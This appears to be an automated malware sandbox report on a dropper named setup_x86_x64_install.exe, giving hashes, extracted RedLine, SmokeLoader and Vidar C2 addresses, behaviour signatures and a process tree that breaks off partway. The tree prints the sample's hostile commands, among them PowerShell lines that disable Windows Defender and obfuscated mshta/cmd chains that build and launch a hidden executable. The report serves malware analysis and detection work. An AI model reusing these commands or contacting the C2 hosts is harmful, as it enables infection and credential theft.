Overview

overview

10

Static

static

setup_x86_...ll.exe

windows7_x64

10

setup_x86_...ll.exe

windows7_x64

10

setup_x86_...ll.exe

windows7_x64

10

setup_x86_...ll.exe

windows11_x64

10

setup_x86_...ll.exe

windows10_x64

10

setup_x86_...ll.exe

windows10_x64

10

setup_x86_...ll.exe

windows10_x64

10

Resubmissions

02-11-2021 06:54

211102-hpn1zsbhc2 10

02-11-2021 06:42

211102-hgpmjsgggp 10

01-11-2021 21:47

211101-1ncknsfgfm 10

Analysis

  • max time kernel
    4547s
  • max time network
    26861s
  • platform
    windows10_x64
  • resource
    win10-en-20211014
  • submitted
    01-11-2021 21:47

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    setup_x86_x64_install.exe

  • Size

    4.2MB

  • MD5

    b5b5fe52ed9ca7d47bfb857498fd684c

  • SHA1

    9c17089a630141c9b4e13ef46ab334d46709fdb8

  • SHA256

    6cbb4380d880c6bab221c81122b32e225ebf224942191fb08df5df82f971864b

  • SHA512

    482de7cacf73eb37050e323312b05d3d5d2152048efa5defa4b3d8687f6b3355233d8bf3f04d6107a7214f4b21e4f81f83313ecaf3bdcda98c7d95d60a41e79a

Score
10/10
formbookredlinesmokeloadersocelarsvidar933media0121newjustaspackv2backdoordiscoveryevasioninfostealerpersistencespywarestealersuricatatrojan

Malware Config

Extracted

Family

redline

Botnet

media0121

C2

91.121.67.60:23325

Extracted

Family

redline

Botnet

newjust

C2

135.181.129.119:4805

Extracted

Family

smokeloader

Version

2020

C2

http://brandyjaggers.com/upload/

http://andbal.com/upload/

http://alotofquotes.com/upload/

http://szpnc.cn/upload/

http://uggeboots.com/upload/

http://100klv.com/upload/

http://rapmusic.at/upload/
rc4.i32
rc4.i32

Extracted

Family

vidar

Version

41.6

Botnet

933

C2

https://mas.to/@lilocc

Attributes
  • profile_id

    933

Signatures

  • Formbook

    Formbook is a data stealing malware which is capable of stealing data.

    trojanspywarestealerformbook
  • Modifies Windows Defender Real-time Protection settings 3 TTPs
    evasiontrojan
  • Process spawned unexpected child process 7 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • RedLine Payload 4 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

    trojanbackdoorsmokeloader
  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

    stealersocelars
  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 4 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

    stealervidar
  • Windows security bypass 2 TTPs
    evasiontrojan
  • suricata: ET MALWARE ClipBanker Variant Activity (POST)

    suricata: ET MALWARE ClipBanker Variant Activity (POST)

    suricata
  • suricata: ET MALWARE FormBook CnC Checkin (GET)

    suricata: ET MALWARE FormBook CnC Checkin (GET)

    suricata
  • suricata: ET MALWARE FormBook CnC Checkin (POST) M2

    suricata: ET MALWARE FormBook CnC Checkin (POST) M2

    suricata
  • suricata: ET MALWARE GCleaner Downloader Activity M5

    suricata: ET MALWARE GCleaner Downloader Activity M5

    suricata
  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata
  • suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity

    suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity

    suricata
  • suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin

    suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin

    suricata
  • suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2

    suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2

    suricata
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

    evasion
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
    evasion
  • Vidar Stealer 2 IoCs
    stealer
  • ASPack v2.12-2.42 7 IoCs

    Detects executables packed with ASPack v2.12-2.42

    aspackv2
  • Adds policy Run key to start application 2 TTPs 2 IoCs
    persistence
  • Blocklisted process makes network request 64 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 2 IoCs
  • Executes dropped EXE 64 IoCs
  • Checks BIOS information in registry 2 TTPs 20 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 8 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Windows security modification 2 TTPs 4 IoCs
    evasiontrojan
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 8 IoCs
    persistence
  • Checks for any installed AV software in registry 1 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Checks whether UAC is enabled 1 TTPs 12 IoCs
    evasiontrojan
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 15 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 35 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 23 IoCs
  • Suspicious use of SetThreadContext 13 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 17 IoCs
  • Checks SCSI registry key(s) 3 TTPs 33 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 5 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Download via BitsAdmin 1 TTPs 2 IoCs
    dropper
  • Kills process with taskkill 12 IoCs
    evasion
  • Modifies Internet Explorer settings 1 TTPs 8 IoCs
    adwarespyware
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 7 IoCs
    evasionspywaretrojan
  • Script User-Agent 7 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious behavior: MapViewOfSection 51 IoCs
  • Suspicious behavior: SetClipboardViewer 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 28 IoCs
  • Suspicious use of SetWindowsHookEx 19 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 1 IoCs
    evasion

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
    1⤵
      PID:348
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
      1⤵
        PID:2504
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s WpnService
        1⤵
          PID:2836
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
          1⤵
            PID:2796
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s Browser
            1⤵
            • Suspicious use of SetThreadContext
            PID:2736
            • C:\Windows\system32\svchost.exe
              C:\Windows\system32\svchost.exe -k SystemNetworkService
              2⤵
              • Drops file in System32 directory
              • Checks processor information in registry
              • Modifies data under HKEY_USERS
              PID:5300
          • C:\Windows\Explorer.EXE
            C:\Windows\Explorer.EXE
            1⤵
            • Suspicious behavior: GetForegroundWindowSpam
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SetWindowsHookEx
            PID:2580
            • C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
              "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:2868
              • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                3⤵
                • Executes dropped EXE
                • Suspicious use of WriteProcessMemory
                PID:700
                • C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\setup_install.exe
                  "C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\setup_install.exe"
                  4⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of WriteProcessMemory
                  PID:3852
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
                    5⤵
                    • Suspicious use of WriteProcessMemory
                    PID:3172
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
                      6⤵
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:368
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
                    5⤵
                    • Suspicious use of WriteProcessMemory
                    PID:4064
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
                      6⤵
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:600
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c Mon17870faab0.exe
                    5⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1912
                    • C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\Mon17870faab0.exe
                      Mon17870faab0.exe
                      6⤵
                      • Executes dropped EXE
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1048
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd.exe /c taskkill /f /im chrome.exe
                        7⤵
                          PID:7840
                          • C:\Windows\SysWOW64\taskkill.exe
                            taskkill /f /im chrome.exe
                            8⤵
                            • Kills process with taskkill
                            PID:4512
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c Mon175e6c8b40064b8c8.exe
                      5⤵
                        PID:3040
                        • C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\Mon175e6c8b40064b8c8.exe
                          Mon175e6c8b40064b8c8.exe
                          6⤵
                          • Executes dropped EXE
                          PID:2004
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c Mon173a360b525.exe
                        5⤵
                          PID:2036
                          • C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\Mon173a360b525.exe
                            Mon173a360b525.exe
                            6⤵
                            • Executes dropped EXE
                            PID:3096
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\6831137645.exe"
                              7⤵
                                PID:4552
                                • C:\Users\Admin\AppData\Local\Temp\6831137645.exe
                                  "C:\Users\Admin\AppData\Local\Temp\6831137645.exe"
                                  8⤵
                                  • Executes dropped EXE
                                  PID:2432
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\1607525511.exe"
                                7⤵
                                  PID:2920
                                  • C:\Users\Admin\AppData\Local\Temp\1607525511.exe
                                    "C:\Users\Admin\AppData\Local\Temp\1607525511.exe"
                                    8⤵
                                      PID:4464
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /c taskkill /im "Mon173a360b525.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\Mon173a360b525.exe" & exit
                                    7⤵
                                      PID:4364
                                      • C:\Windows\SysWOW64\taskkill.exe
                                        taskkill /im "Mon173a360b525.exe" /f
                                        8⤵
                                        • Kills process with taskkill
                                        PID:8140
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /c Mon17bffc2992eb3d.exe /mixone
                                  5⤵
                                    PID:2760
                                    • C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\Mon17bffc2992eb3d.exe
                                      Mon17bffc2992eb3d.exe /mixone
                                      6⤵
                                      • Executes dropped EXE
                                      PID:1520
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 1520 -s 664
                                        7⤵
                                        • Program crash
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4288
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 1520 -s 680
                                        7⤵
                                        • Program crash
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:5068
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 1520 -s 636
                                        7⤵
                                        • Program crash
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4828
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 1520 -s 732
                                        7⤵
                                        • Program crash
                                        PID:4672
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 1520 -s 884
                                        7⤵
                                        • Program crash
                                        PID:4580
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 1520 -s 928
                                        7⤵
                                        • Program crash
                                        PID:5980
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 1520 -s 1104
                                        7⤵
                                        • Suspicious use of NtCreateProcessExOtherParentProcess
                                        • Program crash
                                        PID:4892
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c Mon178e7a516181.exe
                                    5⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:392
                                    • C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\Mon178e7a516181.exe
                                      Mon178e7a516181.exe
                                      6⤵
                                      • Executes dropped EXE
                                      • Checks computer location settings
                                      • Modifies system certificate store
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:944
                                      • C:\Users\Admin\Pictures\Adobe Films\KWw_Na9PoK6E2at8khQXjitr.exe
                                        "C:\Users\Admin\Pictures\Adobe Films\KWw_Na9PoK6E2at8khQXjitr.exe"
                                        7⤵
                                        • Executes dropped EXE
                                        PID:516
                                      • C:\Users\Admin\Pictures\Adobe Films\8t8B84uCRSWE3mwZuTRWxKhE.exe
                                        "C:\Users\Admin\Pictures\Adobe Films\8t8B84uCRSWE3mwZuTRWxKhE.exe"
                                        7⤵
                                        • Executes dropped EXE
                                        • Checks BIOS information in registry
                                        • Checks whether UAC is enabled
                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                        PID:5292
                                        • C:\Users\Admin\AppData\Local\Temp\cli.exe
                                          "C:\Users\Admin\AppData\Local\Temp\cli.exe"
                                          8⤵
                                          • Suspicious behavior: SetClipboardViewer
                                          PID:7280
                                      • C:\Users\Admin\Pictures\Adobe Films\UDl5MrZhovzJ9aalPEClXxwq.exe
                                        "C:\Users\Admin\Pictures\Adobe Films\UDl5MrZhovzJ9aalPEClXxwq.exe"
                                        7⤵
                                        • Executes dropped EXE
                                        • Checks BIOS information in registry
                                        • Checks whether UAC is enabled
                                        • Suspicious use of SetThreadContext
                                        PID:5284
                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                          8⤵
                                            PID:5512
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5284 -s 492
                                            8⤵
                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                            • Program crash
                                            PID:4496
                                        • C:\Users\Admin\Pictures\Adobe Films\6Dc4QkJcH_bc6k4XPPf58CgI.exe
                                          "C:\Users\Admin\Pictures\Adobe Films\6Dc4QkJcH_bc6k4XPPf58CgI.exe"
                                          7⤵
                                          • Executes dropped EXE
                                          • Checks BIOS information in registry
                                          • Checks whether UAC is enabled
                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                          PID:5276
                                        • C:\Users\Admin\Pictures\Adobe Films\zOSiw22fXWUlLyCSO8v9nq6z.exe
                                          "C:\Users\Admin\Pictures\Adobe Films\zOSiw22fXWUlLyCSO8v9nq6z.exe"
                                          7⤵
                                          • Executes dropped EXE
                                          PID:5228
                                        • C:\Users\Admin\Pictures\Adobe Films\W30vm3LUtOHOLL7zBnVYdAYg.exe
                                          "C:\Users\Admin\Pictures\Adobe Films\W30vm3LUtOHOLL7zBnVYdAYg.exe"
                                          7⤵
                                          • Executes dropped EXE
                                          PID:5216
                                        • C:\Users\Admin\Pictures\Adobe Films\maDKjDOdzVgHa7Y8JpsfZClW.exe
                                          "C:\Users\Admin\Pictures\Adobe Films\maDKjDOdzVgHa7Y8JpsfZClW.exe"
                                          7⤵
                                            PID:5208
                                          • C:\Users\Admin\Pictures\Adobe Films\pQnAbYmg3ChB2IJbQyaavv5U.exe
                                            "C:\Users\Admin\Pictures\Adobe Films\pQnAbYmg3ChB2IJbQyaavv5U.exe"
                                            7⤵
                                            • Executes dropped EXE
                                            • Suspicious use of SetThreadContext
                                            • Suspicious behavior: MapViewOfSection
                                            PID:5200
                                          • C:\Users\Admin\Pictures\Adobe Films\7lIFfIAq75ayPS1l79AzqZbx.exe
                                            "C:\Users\Admin\Pictures\Adobe Films\7lIFfIAq75ayPS1l79AzqZbx.exe"
                                            7⤵
                                              PID:5192
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5192 -s 672
                                                8⤵
                                                • Program crash
                                                PID:4996
                                            • C:\Users\Admin\Pictures\Adobe Films\xR3OQ2Qh_z7R_Ve5A7amjTnU.exe
                                              "C:\Users\Admin\Pictures\Adobe Films\xR3OQ2Qh_z7R_Ve5A7amjTnU.exe"
                                              7⤵
                                              • Executes dropped EXE
                                              • Suspicious use of SetThreadContext
                                              PID:5184
                                              • C:\Users\Admin\Pictures\Adobe Films\xR3OQ2Qh_z7R_Ve5A7amjTnU.exe
                                                "C:\Users\Admin\Pictures\Adobe Films\xR3OQ2Qh_z7R_Ve5A7amjTnU.exe"
                                                8⤵
                                                  PID:3456
                                              • C:\Users\Admin\Pictures\Adobe Films\AAsjqRognrs5OHbgENK9auj7.exe
                                                "C:\Users\Admin\Pictures\Adobe Films\AAsjqRognrs5OHbgENK9auj7.exe"
                                                7⤵
                                                • Executes dropped EXE
                                                • Drops file in Program Files directory
                                                PID:5176
                                                • C:\Program Files (x86)\Company\NewProduct\cutm3.exe
                                                  "C:\Program Files (x86)\Company\NewProduct\cutm3.exe"
                                                  8⤵
                                                    PID:3500
                                                  • C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe
                                                    "C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"
                                                    8⤵
                                                    • Checks whether UAC is enabled
                                                    PID:4196
                                                • C:\Users\Admin\Pictures\Adobe Films\cewNSWFaXogGyGjuphJS2DKK.exe
                                                  "C:\Users\Admin\Pictures\Adobe Films\cewNSWFaXogGyGjuphJS2DKK.exe"
                                                  7⤵
                                                  • Executes dropped EXE
                                                  • Checks BIOS information in registry
                                                  • Checks whether UAC is enabled
                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                  PID:5168
                                                • C:\Users\Admin\Pictures\Adobe Films\8NH7scC85tXvro4oKnjmDNxQ.exe
                                                  "C:\Users\Admin\Pictures\Adobe Films\8NH7scC85tXvro4oKnjmDNxQ.exe"
                                                  7⤵
                                                    PID:4524
                                                  • C:\Users\Admin\Pictures\Adobe Films\xiByWaoG_7rk4c36MvEOU6HY.exe
                                                    "C:\Users\Admin\Pictures\Adobe Films\xiByWaoG_7rk4c36MvEOU6HY.exe"
                                                    7⤵
                                                      PID:4588
                                                      • C:\Users\Admin\Documents\UWZiUOJl0LZG66f2pahI0uWq.exe
                                                        "C:\Users\Admin\Documents\UWZiUOJl0LZG66f2pahI0uWq.exe"
                                                        8⤵
                                                        • Checks computer location settings
                                                        PID:7348
                                                        • C:\Users\Admin\Pictures\Adobe Films\Ilaefr1v7j44DGPNmdV_RRvT.exe
                                                          "C:\Users\Admin\Pictures\Adobe Films\Ilaefr1v7j44DGPNmdV_RRvT.exe"
                                                          9⤵
                                                            PID:4652
                                                          • C:\Users\Admin\Pictures\Adobe Films\imO0ZiS9oGLwhNVBuuZbV1xs.exe
                                                            "C:\Users\Admin\Pictures\Adobe Films\imO0ZiS9oGLwhNVBuuZbV1xs.exe"
                                                            9⤵
                                                              PID:4908
                                                            • C:\Users\Admin\Pictures\Adobe Films\uPYxRNAxSvxSHV00bS0YeTvO.exe
                                                              "C:\Users\Admin\Pictures\Adobe Films\uPYxRNAxSvxSHV00bS0YeTvO.exe"
                                                              9⤵
                                                                PID:596
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  cmd.exe /c taskkill /f /im chrome.exe
                                                                  10⤵
                                                                    PID:6560
                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                      taskkill /f /im chrome.exe
                                                                      11⤵
                                                                      • Executes dropped EXE
                                                                      • Kills process with taskkill
                                                                      PID:5368
                                                                • C:\Users\Admin\Pictures\Adobe Films\jxI5xrUu3jnl7Xc0smG8sEXe.exe
                                                                  "C:\Users\Admin\Pictures\Adobe Films\jxI5xrUu3jnl7Xc0smG8sEXe.exe"
                                                                  9⤵
                                                                  • Checks SCSI registry key(s)
                                                                  • Suspicious behavior: MapViewOfSection
                                                                  PID:7564
                                                                • C:\Users\Admin\Pictures\Adobe Films\bAIBrcCy3xrVuiQu8gXHl3jY.exe
                                                                  "C:\Users\Admin\Pictures\Adobe Films\bAIBrcCy3xrVuiQu8gXHl3jY.exe"
                                                                  9⤵
                                                                    PID:2976
                                                                  • C:\Users\Admin\Pictures\Adobe Films\Hb6h5uEbcZ1THC4k6kC2dsk3.exe
                                                                    "C:\Users\Admin\Pictures\Adobe Films\Hb6h5uEbcZ1THC4k6kC2dsk3.exe"
                                                                    9⤵
                                                                      PID:5828
                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                        "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\Hb6h5uEbcZ1THC4k6kC2dsk3.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\Pictures\Adobe Films\Hb6h5uEbcZ1THC4k6kC2dsk3.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                                                        10⤵
                                                                          PID:7484
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\Hb6h5uEbcZ1THC4k6kC2dsk3.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\Pictures\Adobe Films\Hb6h5uEbcZ1THC4k6kC2dsk3.exe" ) do taskkill -f -iM "%~NxM"
                                                                            11⤵
                                                                              PID:196
                                                                              • C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe
                                                                                ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi
                                                                                12⤵
                                                                                  PID:6696
                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                    "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                                                                    13⤵
                                                                                      PID:7420
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "/PLQtzfgO0m8dRv4iYALOqi " == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"
                                                                                        14⤵
                                                                                          PID:7820
                                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                                        "C:\Windows\System32\mshta.exe" VbScRIpt: CLosE ( cReAteobjEcT ( "wscRiPt.SheLl" ). RUn ( "C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE ) )
                                                                                        13⤵
                                                                                          PID:2084
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            "C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC
                                                                                            14⤵
                                                                                              PID:7156
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /S /D /c" EcHo "
                                                                                                15⤵
                                                                                                  PID:3764
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"
                                                                                                  15⤵
                                                                                                    PID:200
                                                                                                  • C:\Windows\SysWOW64\msiexec.exe
                                                                                                    msiexec -Y ..\lXQ2g.WC
                                                                                                    15⤵
                                                                                                    • Loads dropped DLL
                                                                                                    PID:5668
                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                              taskkill -f -iM "Hb6h5uEbcZ1THC4k6kC2dsk3.exe"
                                                                                              12⤵
                                                                                              • Kills process with taskkill
                                                                                              PID:4900
                                                                                      • C:\Users\Admin\Pictures\Adobe Films\QEgmUrqMWWS22xi3nwDh3Hqz.exe
                                                                                        "C:\Users\Admin\Pictures\Adobe Films\QEgmUrqMWWS22xi3nwDh3Hqz.exe"
                                                                                        9⤵
                                                                                          PID:6468
                                                                                          • C:\Users\Admin\Pictures\Adobe Films\QEgmUrqMWWS22xi3nwDh3Hqz.exe
                                                                                            "C:\Users\Admin\Pictures\Adobe Films\QEgmUrqMWWS22xi3nwDh3Hqz.exe" -u
                                                                                            10⤵
                                                                                              PID:4676
                                                                                          • C:\Users\Admin\Pictures\Adobe Films\zrT3_FY7dpLO8jDjzi1ZJ8Pj.exe
                                                                                            "C:\Users\Admin\Pictures\Adobe Films\zrT3_FY7dpLO8jDjzi1ZJ8Pj.exe"
                                                                                            9⤵
                                                                                            • Loads dropped DLL
                                                                                            PID:4256
                                                                                            • C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
                                                                                              C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
                                                                                              10⤵
                                                                                              • Loads dropped DLL
                                                                                              • Adds Run key to start application
                                                                                              PID:6732
                                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--ZgwMku75"
                                                                                                11⤵
                                                                                                • Checks computer location settings
                                                                                                • Loads dropped DLL
                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                PID:1416
                                                                                                • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
